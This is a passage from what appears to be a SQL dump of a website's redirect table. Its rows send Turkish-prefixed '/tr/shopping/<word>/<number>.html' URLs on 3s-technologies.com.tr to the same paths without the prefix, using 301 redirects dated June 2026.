00:00:00',301),(71033,'https://3s-technologies.com.tr/tr/shopping/planarioid/1500607910.html',NULL,'https://3s-technologies.com.tr/shopping/planarioid/1500607910.html','',1,0,'2026-06-11 02:58:46','0000-00-00 00:00:00',301),(71034,'https://3s-technologies.com.tr/tr/shopping/norseman/2998712722.html',NULL,'https://3s-technologies.com.tr/shopping/norseman/2998712722.html','',1,0,'2026-06-11 02:58:49','0000-00-00 00:00:00',301),(71035,'https://3s-technologies.com.tr/tr/shopping/podophthalmata/967978119.html',NULL,'https://3s-technologies.com.tr/shopping/podophthalmata/967978119.html','',1,0,'2026-06-11 02:58:52','0000-00-00 00:00:00',301),(71036,'https://3s-technologies.com.tr/tr/shopping/cynosure/1252468987.html',NULL,'https://3s-technologies.com.tr/shopping/cynosure/1252468987.html','',1,0,'2026-06-11 02:58:54','0000-00-00 00:00:00',301),(71037,'https://3s-technologies.com.tr/tr/shopping/tumulous/1007850587.html',NULL,'https://3s-technologies.com.tr/shopping/tumulous/1007850587.html','',1,0,'2026-06-11 02:58:57','0000-00-00 00:00:00',301),(71038,'https://3s-technologies.com.tr/tr/shopping/rapturist/1404925594.html',NULL,'https://3s-technologies.com.tr/shopping/rapturist/1404925594.html','',1,0,'2026-06-11 02:59:00','0000-00-00 00:00:00',301),(71039,'https://3s-technologies.com.tr/tr/shopping/notidanidae/1632185818.html',NULL,'https://3s-technologies.com.tr/shopping/notidanidae/1632185818.html','',1,0,'2026-06-11 02:59:03','0000-00-00 00:00:00',301),(71040,'https://3s-technologies.com.tr/tr/shopping/skirmisher/3416515599.html',NULL,'https://3s-technologies.com.tr/shopping/skirmisher/3416515599.html','',1,0,'2026-06-11 02:59:06','0000-00-00 00:00:00',301),(71041,'https://3s-technologies.com.tr/tr/shopping/rhaponticine/4011560252.html',NULL,'https://3s-technologies.com.tr/shopping/rhaponticine/4011560252.html','',1,0,'2026-06-11 02:59:09','0000-00-00 00:00:00',301),(71042,'https://3s-technologies.com.tr/tr/shopping/anthelmintica/615071138.html',NULL,'https://3s-technologies.com.tr/shopping/anthelmintica/615071138.html','',1,0,'2026-06-11 02:59:12','0000-00-00 00:00:00',301),(71043,'https://3s-technologies.com.tr/tr/shopping/insubordination/2517266729.html',NULL,'https://3s-technologies.com.tr/shopping/insubordination/2517266729.html','',1,0,'2026-06-11 02:59:19','0000-00-00 00:00:00',301),(71044,'https://3s-technologies.com.tr/tr/shopping/esophageal/1256593499.html',NULL,'https://3s-technologies.com.tr/shopping/esophageal/1256593499.html','',1,0,'2026-06-11 02:59:22','0000-00-00 00:00:00',301),(71045,'https://3s-technologies.com.tr/tr/shopping/antipyrine/845321384.html',NULL,'https://3s-technologies.com.tr/shopping/antipyrine/845321384.html','',1,0,'2026-06-11 02:59:25','0000-00-00 00:00:00',301),(71046,'https://3s-technologies.com.tr/tr/shopping/granitivora/2920930839.html',NULL,'https://3s-technologies.com.tr/shopping/granitivora/2920930839.html','',1,0,'2026-06-11 02:59:28','0000-00-00 00:00:00',301),(71047,'https://3s-technologies.com.tr/tr/shopping/magnoliopsid/3309221235.html',NULL,'https://3s-technologies.com.tr/shopping/magnoliopsid/3309221235.html','',1,0,'2026-06-11 02:59:31','0000-00-00 00:00:00',301),(71048,'https://3s-technologies.com.tr/tr/shopping/amebous/3968116194.html',NULL,'https://3s-technologies.com.tr/shopping/amebous/3968116194.html','',1,0,'2026-06-11 02:59:34','0000-00-00 00:00:00',301),(71049,'https://3s-technologies.com.tr/tr/shopping/diadelphian/2275147520.html',NULL,'https://3s-technologies.com.tr/shopping/diadelphian/2275147520.html','',1,0,'2026-06-11 02:59:37','0000-00-00 00:00:00',301),(71050,'https://3s-technologies.com.tr/tr/shopping/syngnathous/3419892288.html',NULL,'https://3s-technologies.com.tr/shopping/syngnathous/3419892288.html','',1,0,'2026-06-11 02:59:40','0000-00-00 00:00:00',301),(71051,'https://3s-technologies.com.tr/tr/shopping/horsepond/1881481568.html',NULL,'https://3s-technologies.com.tr/shopping/horsepond/1881481568.html','',1,0,'2026-06-11 02:59:43','0000-00-00 00:00:00',301),(71052,'https://3s-technologies.com.tr/tr/shopping/beltane/507523493.html',NULL,'https://3s-technologies.com.tr/shopping/beltane/507523493.html','',1,0,'2026-06-11 02:59:46','0000-00-00 00:00:00',301),(71053,'https://3s-technologies.com.tr/tr/shopping/sparteine/2611969049.html',NULL,'https://3s-technologies.com.tr/shopping/sparteine/2611969049.html','',1,0,'2026-06-11 02:59:49','0000-00-00 00:00:00',301),(71054,'https://3s-technologies.com.tr/tr/shopping/berhymed/2972110948.html',NULL,'https://3s-technologies.com.tr/shopping/berhymed/2972110948.html','',1,0,'2026-06-11 02:59:53','0000-00-00 00:00:00',301),(71055,'https://3s-technologies.com.tr/tr/shopping/occipita/2434622075.html',NULL,'https://3s-technologies.com.tr/shopping/occipita/2434622075.html','',1,0,'2026-06-11 02:59:56','0000-00-00 00:00:00',301),(71056,'https://3s-technologies.com.tr/tr/shopping/bullseye/347002577.html',NULL,'https://3s-technologies.com.tr/shopping/bullseye/347002577.html','',1,0,'2026-06-11 02:59:59','0000-00-00 00:00:00',301),(71057,'https://3s-technologies.com.tr/tr/shopping/homilist/2848021104.html',NULL,'https://3s-technologies.com.tr/shopping/homilist/2848021104.html','',1,0,'2026-06-11 03:00:01','0000-00-00 00:00:00',301),(71058,'https://3s-technologies.com.tr/tr/shopping/carthusian/1867173942.html',NULL,'https://3s-technologies.com.tr/shopping/carthusian/1867173942.html','',1,0,'2026-06-11 03:00:04','0000-00-00 00:00:00',301),(71059,'https://3s-technologies.com.tr/tr/shopping/ambidexterity/2969686766.html',NULL,'https://3s-technologies.com.tr/shopping/ambidexterity/2969686766.html','',1,0,'2026-06-11 03:00:07','0000-00-00 00:00:00',301),(71060,'https://3s-technologies.com.tr/tr/shopping/demoiselle/3131419781.html',NULL,'https://3s-technologies.com.tr/shopping/demoiselle/3131419781.html','',1,0,'2026-06-11 03:00:10','0000-00-00 00:00:00',301),(71061,'https://3s-technologies.com.tr/tr/shopping/anteriority/2378246029.html',NULL,'https://3s-technologies.com.tr/shopping/anteriority/2378246029.html','',1,0,'2026-06-11 03:00:14','0000-00-00 00:00:00',301),(71062,'https://3s-technologies.com.tr/tr/shopping/marsupialia/2860787354.html',NULL,'https://3s-technologies.com.tr/shopping/marsupialia/2860787354.html','',1,0,'2026-06-11 03:00:17','0000-00-00 00:00:00',301),(71063,'https://3s-technologies.com.tr/tr/shopping/unfaith/4037863456.html',NULL,'https://3s-technologies.com.tr/shopping/unfaith/4037863456.html','',1,0,'2026-06-11 03:00:20','0000-00-00 00:00:00',301),(71064,'https://3s-technologies.com.tr/tr/shopping/hemapophysis/3536969146.html',NULL,'https://3s-technologies.com.tr/shopping/hemapophysis/3536969146.html','',1,0,'2026-06-11 03:00:22','0000-00-00 00:00:00',301),(71065,'https://3s-technologies.com.tr/tr/shopping/unhappied/2548108060.html',NULL,'https://3s-technologies.com.tr/shopping/unhappied/2548108060.html','',1,0,'2026-06-11 03:00:26','0000-00-00 00:00:00',301),(71066,'https://3s-technologies.com.tr/tr/shopping/heartwood/3211851383.html',NULL,'https://3s-technologies.com.tr/shopping/heartwood/3211851383.html','',1,0,'2026-06-11 03:00:29','0000-00-00 00:00:00',301),(71067,'https://3s-technologies.com.tr/tr/shopping/tearthumb/1704488420.html',NULL,'https://3s-technologies.com.tr/shopping/tearthumb/1704488420.html','',1,0,'2026-06-11 03:00:32','0000-00-00 00:00:00',301),(71068,'https://3s-technologies.com.tr/tr/shopping/woodmeil/4201924584.html',NULL,'https://3s-technologies.com.tr/shopping/woodmeil/4201924584.html','',1,0,'2026-06-11 03:00:35','0000-00-00 00:00:00',301),(71069,'https://3s-technologies.com.tr/tr/shopping/refectories/797881238.html',NULL,'https://3s-technologies.com.tr/shopping/refectories/797881238.html','',1,0,'2026-06-11 03:00:38','0000-00-00 00:00:00',301),(71070,'https://3s-technologies.com.tr/tr/shopping/myrtaceous/1526966318.html',NULL,'https://3s-technologies.com.tr/shopping/myrtaceous/1526966318.html','',1,0,'2026-06-11 03:00:41','0000-00-00 00:00:00',301),(71071,'https://3s-technologies.com.tr/tr/shopping/rhinolophidae/115225420.html',NULL,'https://3s-technologies.com.tr/shopping/rhinolophidae/115225420.html','',1,0,'2026-06-11 03:00:44','0000-00-00 00:00:00',301),(71072,'https://3s-technologies.com.tr/tr/shopping/haemapophysis/297412290.html',NULL,'https://3s-technologies.com.tr/shopping/haemapophysis/297412290.html','',1,0,'2026-06-11 03:00:47','0000-00-00 00:00:00',301),(71073,'https://3s-technologies.com.tr/tr/shopping/rhacophorus/2916783478.html',NULL,'https://3s-technologies.com.tr/shopping/rhacophorus/2916783478.html','',1,0,'2026-06-11 03:00:50','0000-00-00 00:00:00',301),(71074,'https://3s-technologies.com.tr/tr/shopping/bullaries/2615431108.html',NULL,'https://3s-technologies.com.tr/shopping/bullaries/2615431108.html','',1,0,'2026-06-11 03:00:53','0000-00-00 00:00:00',301),(71075,'https://3s-technologies.com.tr/tr/shopping/zibellina/368502777.html',NULL,'https://3s-technologies.com.tr/shopping/zibellina/368502777.html','',1,0,'2026-06-11 03:00:56','0000-00-00 00:00:00',301),(71076,'https://3s-technologies.com.tr/tr/shopping/nickeliferous/3869769996.html',NULL,'https://3s-technologies.com.tr/shopping/nickeliferous/3869769996.html','',1,0,'2026-06-11 03:00:59','0000-00-00 00:00:00',301),(71077,'https://3s-technologies.com.tr/tr/shopping/thiocyanic/3987288281.html',NULL,'https://3s-technologies.com.tr/shopping/thiocyanic/3987288281.html','',1,0,'2026-06-11 03:01:02','0000-00-00 00:00:00',301),(71078,'https://3s-technologies.com.tr/tr/shopping/poronotus/3658634808.html',NULL,'https://3s-technologies.com.tr/shopping/poronotus/3658634808.html','',1,0,'2026-06-11 03:01:05','0000-00-00 00:00:00',301),(71079,'https://3s-technologies.com.tr/tr/shopping/unloveliness/4032062553.html',NULL,'https://3s-technologies.com.tr/shopping/unloveliness/4032062553.html','',1,0,'2026-06-11 03:01:08','0000-00-00 00:00:00',301),(71080,'https://3s-technologies.com.tr/tr/shopping/sesquitertian/2056240821.html',NULL,'https://3s-technologies.com.tr/shopping/sesquitertian/2056240821.html','',1,0,'2026-06-11 03:01:11','0000-00-00 00:00:00',301),(71081,'https://3s-technologies.com.tr/tr/shopping/inamorata/344578379.html',NULL,'https://3s-technologies.com.tr/shopping/inamorata/344578379.html','',1,0,'2026-06-11 03:01:14','0000-00-00 00:00:00',301),(71082,'https://3s-technologies.com.tr/tr/shopping/paleophytology/4187782696.html',NULL,'https://3s-technologies.com.tr/shopping/paleophytology/4187782696.html','',1,0,'2026-06-11 03:01:22','0000-00-00 00:00:00',301),(71083,'https://3s-technologies.com.tr/tr/shopping/woodhouse/1945050220.html',NULL,'https://3s-technologies.com.tr/shopping/woodhouse/1945050220.html','',1,0,'2026-06-11 03:01:31','0000-00-00 00:00:00',301),(71084,'https://3s-technologies.com.tr/tr/shopping/photobiotic/1146874937.html',NULL,'https://3s-technologies.com.tr/shopping/photobiotic/1146874937.html','',1,0,'2026-06-11 03:01:33','0000-00-00 00:00:00',301),(71085,'https://3s-technologies.com.tr/tr/shopping/octodont/980838796.html',NULL,'https://3s-technologies.com.tr/shopping/octodont/980838796.html','',1,0,'2026-06-11 03:01:36','0000-00-00 00:00:00',301),(71086,'https://3s-technologies.com.tr/tr/shopping/stomatology/712630551.html',NULL,'https://3s-technologies.com.tr/shopping/stomatology/712630551.html','',1,0,'2026-06-11 03:01:39','0000-00-00 00:00:00',301),(71087,'https://3s-technologies.com.tr/tr/shopping/tophin/1092532339.html',NULL,'https://3s-technologies.com.tr/shopping/tophin/1092532339.html','',1,0,'2026-06-11 03:01:42','0000-00-00 00:00:00',301),(71088,'https://3s-technologies.com.tr/tr/shopping/diarthrodial/2089610016.html',NULL,'https://3s-technologies.com.tr/shopping/diarthrodial/2089610016.html','',1,0,'2026-06-11 03:01:45','0000-00-00 00:00:00',301),(71089,'https://3s-technologies.com.tr/tr/shopping/pronounced/1705700519.html',NULL,'https://3s-technologies.com.tr/shopping/pronounced/1705700519.html','',1,0,'2026-06-11 03:01:48','0000-00-00 00:00:00',301),(71090,'https://3s-technologies.com.tr/tr/shopping/anaerobies/2902459787.html',NULL,'https://3s-technologies.com.tr/shopping/anaerobies/2902459787.html','',1,0,'2026-06-11 03:01:51','0000-00-00 00:00:00',301),(71091,'https://3s-technologies.com.tr/tr/shopping/megacoulomb/3839533631.html',NULL,'https://3s-technologies.com.tr/shopping/megacoulomb/3839533631.html','',1,0,'2026-06-11 03:01:55','0000-00-00 00:00:00',301),(71092,'https://3s-technologies.com.tr/tr/shopping/gadidae/202788123.html',NULL,'https://3s-technologies.com.tr/shopping/gadidae/202788123.html','',1,0,'2026-06-11 03:01:57','0000-00-00 00:00:00',301),(71093,'https://3s-technologies.com.tr/tr/shopping/ealderman/3773195439.html',NULL,'https://3s-technologies.com.tr/shopping/ealderman/3773195439.html','',1,0,'2026-06-11 03:02:00','0000-00-00 00:00:00',301),(71094,'https://3s-technologies.com.tr/tr/shopping/depressomotor/1310936097.html',NULL,'https://3s-technologies.com.tr/shopping/depressomotor/1310936097.html','',1,0,'2026-06-11 03:02:03','0000-00-00 00:00:00',301),(71095,'https://3s-technologies.com.tr/tr/shopping/collider/3605147236.html',NULL,'https://3s-technologies.com.tr/shopping/collider/3605147236.html','',1,0,'2026-06-11 03:02:10','0000-00-00 00:00:00',301),(71096,'https://3s-technologies.com.tr/tr/shopping/bewraying/760979051.html',NULL,'https://3s-technologies.com.tr/shopping/bewraying/760979051.html','',1,0,'2026-06-11 03:02:14','0000-00-00 00:00:00',301),(71097,'https://3s-technologies.com.tr/tr/shopping/undersuit/1259499057.html',NULL,'https://3s-technologies.com.tr/shopping/undersuit/1259499057.html','',1,0,'2026-06-11 03:02:17','0000-00-00 00:00:00',301),(71098,'https://3s-technologies.com.tr/tr/shopping/abusively/2889157683.html',NULL,'https://3s-technologies.com.tr/shopping/abusively/2889157683.html','',1,0,'2026-06-11 03:02:22','0000-00-00 00:00:00',301),(71099,'https://3s-technologies.com.tr/tr/shopping/larking/2106985704.html',NULL,'https://3s-technologies.com.tr/shopping/larking/2106985704.html','',1,0,'2026-06-11 03:02:25','0000-00-00 00:00:00',301),(71100,'https://3s-technologies.com.tr/tr/shopping/plesiosaurus/3165444574.html',NULL,'https://3s-technologies.com.tr/shopping/plesiosaurus/3165444574.html','',1,0,'2026-06-11 03:02:30','0000-00-00 00:00:00',301),(71101,'https://3s-technologies.com.tr/tr/shopping/rumney/15901957.html',NULL,'https://3s-technologies.com.tr/shopping/rumney/15901957.html','',1,0,'2026-06-11 03:02:34','0000-00-00 00:00:00',301),(71102,'https://3s-technologies.com.tr/tr/shopping/substantialize/623777583.html',NULL,'https://3s-technologies.com.tr/shopping/substantialize/623777583.html','',1,0,'2026-06-11 03:02:38','0000-00-00 00:00:00',301),(71103,'https://3s-technologies.com.tr/tr/shopping/polypite/249514475.html',NULL,'https://3s-technologies.com.tr/shopping/polypite/249514475.html','',1,0,'2026-06-11 03:02:40','0000-00-00 00:00:00',301),(71104,'https://3s-technologies.com.tr/tr/shopping/unmutable/3215133693.html',NULL,'https://3s-technologies.com.tr/shopping/unmutable/3215133693.html','',1,0,'2026-06-11 03:02:45','0000-00-00 00:00:00',301),(71105,'https://3s-technologies.com.tr/tr/shopping/footing/528275902.html',NULL,'https://3s-technologies.com.tr/shopping/footing/528275902.html','',1,0,'2026-06-11 03:02:48','0000-00-00 00:00:00',301),(71106,'https://3s-technologies.com.tr/tr/shopping/profiled/2115835038.html',NULL,'https://3s-technologies.com.tr/shopping/profiled/2115835038.html','',1,0,'2026-06-11 03:02:51','0000-00-00 00:00:00',301),(71107,'https://3s-technologies.com.tr/tr/shopping/boundedness/4110647402.html',NULL,'https://3s-technologies.com.tr/shopping/boundedness/4110647402.html','',1,0,'2026-06-11 03:02:54','0000-00-00 00:00:00',301),(71108,'https://3s-technologies.com.tr/tr/shopping/chickadee/3472647741.html',NULL,'https://3s-technologies.com.tr/shopping/chickadee/3472647741.html','',1,0,'2026-06-11 03:03:05','0000-00-00 00:00:00',301),(71109,'https://3s-technologies.com.tr/tr/shopping/sermonize/2020472564.html',NULL,'https://3s-technologies.com.tr/shopping/sermonize/2020472564.html','',1,0,'2026-06-11 03:03:06','0000-00-00 00:00:00',301),(71110,'https://3s-technologies.com.tr/tr/shopping/poling/1409859740.html',NULL,'https://3s-technologies.com.tr/shopping/poling/1409859740.html','',1,0,'2026-06-11 03:03:09','0000-00-00 00:00:00',301),(71111,'https://3s-technologies.com.tr/tr/shopping/mimulus/1451026023.html',NULL,'https://3s-technologies.com.tr/shopping/mimulus/1451026023.html','',1,0,'2026-06-11 03:03:14','0000-00-00 00:00:00',301),(71112,'https://3s-technologies.com.tr/tr/shopping/deciduous/893478562.html',NULL,'https://3s-technologies.com.tr/shopping/deciduous/893478562.html','',1,0,'2026-06-11 03:03:15','0000-00-00 00:00:00',301),(71113,'https://3s-technologies.com.tr/tr/shopping/blimp/1684941271.html',NULL,'https://3s-technologies.com.tr/shopping/blimp/1684941271.html','',1,0,'2026-06-11 03:03:18','0000-00-00 00:00:00',301),(71114,'https://3s-technologies.com.tr/tr/shopping/costing/3405474170.html',NULL,'https://3s-technologies.com.tr/shopping/costing/3405474170.html','',1,0,'2026-06-11 03:03:23','0000-00-00 00:00:00',301),(71115,'https://3s-technologies.com.tr/tr/shopping/robbed/2508994856.html',NULL,'https://3s-technologies.com.tr/shopping/robbed/2508994856.html','',1,0,'2026-06-11 03:03:25','0000-00-00 00:00:00',301),(71116,'https://3s-technologies.com.tr/tr/shopping/recomposed/3824674086.html',NULL,'https://3s-technologies.com.tr/shopping/recomposed/3824674086.html','',1,0,'2026-06-11 03:03:29','0000-00-00 00:00:00',301),(71117,'https://3s-technologies.com.tr/tr/shopping/always/3006841706.html',NULL,'https://3s-technologies.com.tr/shopping/always/3006841706.html','',1,0,'2026-06-11 03:03:31','0000-00-00 00:00:00',301),(71118,'https://3s-technologies.com.tr/tr/shopping/diagnostics/1045330235.html',NULL,'https://3s-technologies.com.tr/shopping/diagnostics/1045330235.html','',1,0,'2026-06-11 03:03:34','0000-00-00 00:00:00',301),(71119,'https://3s-technologies.com.tr/tr/shopping/wedded/4080836383.html',NULL,'https://3s-technologies.com.tr/shopping/wedded/4080836383.html','',1,0,'2026-06-11 03:03:38','0000-00-00 00:00:00',301),(71120,'https://3s-technologies.com.tr/tr/shopping/predicatively/2189542830.html',NULL,'https://3s-technologies.com.tr/shopping/predicatively/2189542830.html','',1,0,'2026-06-11 03:03:43','0000-00-00 00:00:00',301),(71121,'https://3s-technologies.com.tr/tr/shopping/memorizing/846919606.html',NULL,'https://3s-technologies.com.tr/shopping/memorizing/846919606.html','',1,0,'2026-06-11 03:03:48','0000-00-00 00:00:00',301),(71122,'https://3s-technologies.com.tr/tr/shopping/trinity/3178702621.html',NULL,'https://3s-technologies.com.tr/shopping/trinity/3178702621.html','',1,0,'2026-06-11 03:03:51','0000-00-00 00:00:00',301),(71123,'https://3s-technologies.com.tr/tr/shopping/fourcycle/1092061208.html',NULL,'https://3s-technologies.com.tr/shopping/fourcycle/1092061208.html','',1,0,'2026-06-11 03:03:54','0000-00-00 00:00:00',301),(71124,'https://3s-technologies.com.tr/tr/shopping/transpass/2143136141.html',NULL,'https://3s-technologies.com.tr/shopping/transpass/2143136141.html','',1,0,'2026-06-11 03:03:57','0000-00-00 00:00:00',301),(71125,'https://3s-technologies.com.tr/tr/shopping/trimness/70081032.html',NULL,'https://3s-technologies.com.tr/shopping/trimness/70081032.html','',1,0,'2026-06-11 03:04:00','0000-00-00 00:00:00',301),(71126,'https://3s-technologies.com.tr/tr/shopping/fallowed/3531745704.html',NULL,'https://3s-technologies.com.tr/shopping/fallowed/3531745704.html','',1,0,'2026-06-11 03:04:04','0000-00-00 00:00:00',301),(71127,'https://3s-technologies.com.tr/tr/shopping/sequent/2793089260.html',NULL,'https://3s-technologies.com.tr/shopping/sequent/2793089260.html','',1,0,'2026-06-11 03:04:06','0000-00-00 00:00:00',301),(71128,'https://3s-technologies.com.tr/tr/shopping/bookwork/460838780.html',NULL,'https://3s-technologies.com.tr/shopping/bookwork/460838780.html','',1,0,'2026-06-11 03:04:09','0000-00-00 00:00:00',301),(71129,'https://3s-technologies.com.tr/tr/shopping/ingraff/2832390887.html',NULL,'https://3s-technologies.com.tr/shopping/ingraff/2832390887.html','',1,0,'2026-06-11 03:04:12','0000-00-00 00:00:00',301),(71130,'https://3s-technologies.com.tr/tr/shopping/acantholithodes/4139095913.html',NULL,'https://3s-technologies.com.tr/shopping/acantholithodes/4139095913.html','',1,0,'2026-06-11 03:04:15','0000-00-00 00:00:00',301),(71131,'https://3s-technologies.com.tr/tr/shopping/annihilated/2248587369.html',NULL,'https://3s-technologies.com.tr/shopping/annihilated/2248587369.html','',1,0,'2026-06-11 03:04:18','0000-00-00 00:00:00',301),(71132,'https://3s-technologies.com.tr/tr/shopping/profert/3702377436.html',NULL,'https://3s-technologies.com.tr/shopping/profert/3702377436.html','',1,0,'2026-06-11 03:04:23','0000-00-00 00:00:00',301),(71133,'https://3s-technologies.com.tr/tr/shopping/sycamore/3697411896.html',NULL,'https://3s-technologies.com.tr/shopping/sycamore/3697411896.html','',1,0,'2026-06-11 03:04:25','0000-00-00 00:00:00',301),(71134,'https://3s-technologies.com.tr/tr/shopping/typicus/2056790467.html',NULL,'https://3s-technologies.com.tr/shopping/typicus/2056790467.html','',1,0,'2026-06-11 03:04:29','0000-00-00 00:00:00',301),(71135,'https://3s-technologies.com.tr/tr/shopping/margin/2245538938.html',NULL,'https://3s-technologies.com.tr/shopping/margin/2245538938.html','',1,0,'2026-06-11 03:04:31','0000-00-00 00:00:00',301),(71136,'https://3s-technologies.com.tr/tr/shopping/tumbling/2086861110.html',NULL,'https://3s-technologies.com.tr/shopping/tumbling/2086861110.html','',1,0,'2026-06-11 03:05:15','0000-00-00 00:00:00',301),(71137,'https://3s-technologies.com.tr/tr/shopping/golfing/3992618037.html',NULL,'https://3s-technologies.com.tr/shopping/golfing/3992618037.html','',1,0,'2026-06-11 03:05:19','0000-00-00 00:00:00',301),(71138,'https://3s-technologies.com.tr/tr/shopping/duping/587906037.html',NULL,'https://3s-technologies.com.tr/shopping/duping/587906037.html','',1,0,'2026-06-11 03:05:22','0000-00-00 00:00:00',301),(71139,'https://3s-technologies.com.tr/tr/shopping/inalienably/2102233409.html',NULL,'https://3s-technologies.com.tr/shopping/inalienably/2102233409.html','',1,0,'2026-06-11 03:05:25','0000-00-00 00:00:00',301),(71140,'https://3s-technologies.com.tr/tr/shopping/qualmishly/4259614167.html',NULL,'https://3s-technologies.com.tr/shopping/qualmishly/4259614167.html','',1,0,'2026-06-11 03:05:28','0000-00-00 00:00:00',301),(71141,'https://3s-technologies.com.tr/tr/shopping/enterprise/1925783706.html',NULL,'https://3s-technologies.com.tr/shopping/enterprise/1925783706.html','',1,0,'2026-06-11 03:05:31','0000-00-00 00:00:00',301),(71142,'https://3s-technologies.com.tr/tr/shopping/trumping/1447502911.html',NULL,'https://3s-technologies.com.tr/shopping/trumping/1447502911.html','',1,0,'2026-06-11 03:05:46','0000-00-00 00:00:00',301),(71143,'https://3s-technologies.com.tr/tr/shopping/variedly/3960728162.html',NULL,'https://3s-technologies.com.tr/shopping/variedly/3960728162.html','',1,0,'2026-06-11 03:05:49','0000-00-00 00:00:00',301),(71144,'https://3s-technologies.com.tr/tr/shopping/emaculation/4217924666.html',NULL,'https://3s-technologies.com.tr/shopping/emaculation/4217924666.html','',1,0,'2026-06-11 03:05:52','0000-00-00 00:00:00',301),(71145,'https://3s-technologies.com.tr/tr/shopping/disallow/3307538005.html',NULL,'https://3s-technologies.com.tr/shopping/disallow/3307538005.html','',1,0,'2026-06-11 03:05:55','0000-00-00 00:00:00',301),(71146,'https://3s-technologies.com.tr/tr/shopping/flexural/2165942715.html',NULL,'https://3s-technologies.com.tr/shopping/flexural/2165942715.html','',1,0,'2026-06-11 03:05:58','0000-00-00 00:00:00',301),(71147,'https://3s-technologies.com.tr/tr/shopping/compositae/1276575204.html',NULL,'https://3s-technologies.com.tr/shopping/compositae/1276575204.html','',1,0,'2026-06-11 03:06:01','0000-00-00 00:00:00',301),(71148,'https://3s-technologies.com.tr/tr/shopping/miseration/2734997196.html',NULL,'https://3s-technologies.com.tr/shopping/miseration/2734997196.html','',1,0,'2026-06-11 03:06:06','0000-00-00 00:00:00',301),(71149,'https://3s-technologies.com.tr/tr/shopping/fengite/448007823.html',NULL,'https://3s-technologies.com.tr/shopping/fengite/448007823.html','',1,0,'2026-06-11 03:06:08','0000-00-00 00:00:00',301),(71150,'https://3s-technologies.com.tr/tr/shopping/vindictive/1614014291.html',NULL,'https://3s-technologies.com.tr/shopping/vindictive/1614014291.html','',1,0,'2026-06-11 03:06:11','0000-00-00 00:00:00',301),(71151,'https://3s-technologies.com.tr/tr/shopping/mandibulate/3679500386.html',NULL,'https://3s-technologies.com.tr/shopping/mandibulate/3679500386.html','',1,0,'2026-06-11 03:06:14','0000-00-00 00:00:00',301),(71152,'https://3s-technologies.com.tr/tr/shopping/purblindly/2829686038.html',NULL,'https://3s-technologies.com.tr/shopping/purblindly/2829686038.html','',1,0,'2026-06-11 03:06:17','0000-00-00 00:00:00',301),(71153,'https://3s-technologies.com.tr/tr/shopping/ectozoic/1414448528.html',NULL,'https://3s-technologies.com.tr/shopping/ectozoic/1414448528.html','',1,0,'2026-06-11 03:06:20','0000-00-00 00:00:00',301),(71154,'https://3s-technologies.com.tr/tr/shopping/icterus/873190445.html',NULL,'https://3s-technologies.com.tr/shopping/icterus/873190445.html','',1,0,'2026-06-11 03:06:25','0000-00-00 00:00:00',301),(71155,'https://3s-technologies.com.tr/tr/shopping/macaronis/1661115689.html',NULL,'https://3s-technologies.com.tr/shopping/macaronis/1661115689.html','',1,0,'2026-06-11 03:06:28','0000-00-00 00:00:00',301),(71156,'https://3s-technologies.com.tr/tr/shopping/consonance/2491294476.html',NULL,'https://3s-technologies.com.tr/shopping/consonance/2491294476.html','',1,0,'2026-06-11 03:06:31','0000-00-00 00:00:00',301),(71157,'https://3s-technologies.com.tr/tr/shopping/voltzite/1757969153.html',NULL,'https://3s-technologies.com.tr/shopping/voltzite/1757969153.html','',1,0,'2026-06-11 03:06:34','0000-00-00 00:00:00',301),(71158,'https://3s-technologies.com.tr/tr/shopping/faucet/1472379800.html',NULL,'https://3s-technologies.com.tr/shopping/faucet/1472379800.html','',1,0,'2026-06-11 03:06:37','0000-00-00 00:00:00',301),(71159,'https://3s-technologies.com.tr/tr/shopping/dabble/1781288601.html',NULL,'https://3s-technologies.com.tr/shopping/dabble/1781288601.html','',1,0,'2026-06-11 03:06:40','0000-00-00 00:00:00',301),(71160,'https://3s-technologies.com.tr/tr/shopping/crediting/292188848.html',NULL,'https://3s-technologies.com.tr/shopping/crediting/292188848.html','',1,0,'2026-06-11 03:06:46','0000-00-00 00:00:00',301),(71161,'https://3s-technologies.com.tr/tr/shopping/libellant/1109579785.html',NULL,'https://3s-technologies.com.tr/shopping/libellant/1109579785.html','',1,0,'2026-06-11 03:06:51','0000-00-00 00:00:00',301),(71162,'https://3s-technologies.com.tr/tr/shopping/attendancy/85616838.html',NULL,'https://3s-technologies.com.tr/shopping/attendancy/85616838.html','',1,0,'2026-06-11 03:06:54','0000-00-00 00:00:00',301),(71163,'https://3s-technologies.com.tr/tr/shopping/collodium/3928379760.html',NULL,'https://3s-technologies.com.tr/shopping/collodium/3928379760.html','',1,0,'2026-06-11 03:06:57','0000-00-00 00:00:00',301),(71164,'https://3s-technologies.com.tr/tr/shopping/alder/803374517.html',NULL,'https://3s-technologies.com.tr/shopping/alder/803374517.html','',1,0,'2026-06-11 03:07:00','0000-00-00 00:00:00',301),(71165,'https://3s-technologies.com.tr/tr/shopping/densely/3368896659.html',NULL,'https://3s-technologies.com.tr/shopping/densely/3368896659.html','',1,0,'2026-06-11 03:07:03','0000-00-00 00:00:00',301),(71166,'https://3s-technologies.com.tr/tr/shopping/carpenter/4191065006.html',NULL,'https://3s-technologies.com.tr/shopping/carpenter/4191065006.html','',1,0,'2026-06-11 03:07:18','0000-00-00 00:00:00',301),(71167,'https://3s-technologies.com.tr/tr/shopping/trawler/3534056749.html',NULL,'https://3s-technologies.com.tr/shopping/trawler/3534056749.html','',1,0,'2026-06-11 03:07:20','0000-00-00 00:00:00',301),(71168,'https://3s-technologies.com.tr/tr/shopping/disintegration/4071382099.html',NULL,'https://3s-technologies.com.tr/shopping/disintegration/4071382099.html','',1,0,'2026-06-11 03:07:23','0000-00-00 00:00:00',301),(71169,'https://3s-technologies.com.tr/tr/shopping/plodded/1721372343.html',NULL,'https://3s-technologies.com.tr/shopping/plodded/1721372343.html','',1,0,'2026-06-11 03:07:26','0000-00-00 00:00:00',301),(71170,'https://3s-technologies.com.tr/tr/shopping/bedim/1150157247.html',NULL,'https://3s-technologies.com.tr/shopping/bedim/1150157247.html','',1,0,'2026-06-11 03:07:29','0000-00-00 00:00:00',301),(71171,'https://3s-technologies.com.tr/tr/shopping/therebefore/2422532070.html',NULL,'https://3s-technologies.com.tr/shopping/therebefore/2422532070.html','',1,0,'2026-06-11 03:07:37','0000-00-00 00:00:00',301),(71172,'https://3s-technologies.com.tr/tr/shopping/apologize/3167609164.html',NULL,'https://3s-technologies.com.tr/shopping/apologize/3167609164.html','',1,0,'2026-06-11 03:07:40','0000-00-00 